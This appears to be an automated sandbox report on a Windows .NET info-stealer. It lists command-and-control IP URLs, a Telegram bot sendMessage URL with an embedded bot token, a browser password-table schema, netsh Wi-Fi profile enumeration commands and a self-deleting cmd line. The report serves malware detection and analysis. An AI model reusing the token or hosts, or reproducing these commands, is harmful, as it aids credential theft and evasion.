Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://206.166.251.4:8080/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://206.166.251.4:8080/yrABY_user%40841618_report.wsr
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://206.166.251.4:80802a
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://209.38.221.184
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854CBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://209.38.221.184:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854CBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://209.38.221.184:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://209.38.221.184:8080/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://209.38.221.184:8080/yrABY_user%40841618_report.wsr
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://209.38.221.184:80802a
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://38.207.174.88:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://38.60.191.38:80
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://41.87.207.180:9090
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.235.26.83
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.235.26.83:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.235.26.83:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.235.26.83:8080/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.235.26.83:8080/yrABY_user%40841618_report.wsr
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.235.26.83:80802a
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://47.96.78.224:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:8080/3TJejBPXtn/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:8080/get
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:8080/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:8080/yrABY_user%40841618_report.wsr
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.159.4.50:80802a
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://65.49.205.24:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://67.230.176.97:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://8.216.92.21:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://8.219.110.16:9999
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://8.222.143.111:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: BA9qyj2c9G.exe, 00000000.00000002.2021425648.000001186D5A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C40000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line?fields=query
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011855079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.or
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://138.2.92.67:443
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://154.9.207.142:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C4F000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011865182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011865182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C4F000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2

System Summary

Source: BA9qyj2c9G.exe, vH.cs | Long String: Length: 16503
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B72E3E9 NtClose
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B72B105 NtQueryInformationToken
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B72B2F5 NtQueryInformationToken
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B722BA3
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B73F9A2
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B73E14A
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B72EFEA
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B727275
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B73D9CD
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process token adjusted: Load Driver
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process token adjusted: Security
Source: BA9qyj2c9G.exe, 00000000.00000002.2022102806.000001186D744000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs BA9qyj2c9G.exe
Source: BA9qyj2c9G.exe, 00000000.00000002.2022102806.000001186D744000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs BA9qyj2c9G.exe
Source: BA9qyj2c9G.exe, 00000000.00000000.1638292606.0000011852F7C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameC6f29b175ed84c3a5113f54.exeL vs BA9qyj2c9G.exe
Source: BA9qyj2c9G.exe | Binary or memory string: OriginalFilenameC6f29b175ed84c3a5113f54.exeL vs BA9qyj2c9G.exe
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@26/3@2/7
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B72ED75 AdjustTokenPrivileges
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File created: C:\Users\user\AppData\Local\clg34ib74p
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Mutant created: \Sessions\1\BaseNamedObjects\zs4je1nydq
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: BA9qyj2c9G.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BA9qyj2c9G.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854BF4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BA9qyj2c9G.exe | ReversingLabs: Detection: 68%
Source: BA9qyj2c9G.exe | Virustotal: Detection: 66%
Source: unknown | Process created: C:\Users\user\Desktop\BA9qyj2c9G.exe "C:\Users\user\Desktop\BA9qyj2c9G.exe"
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
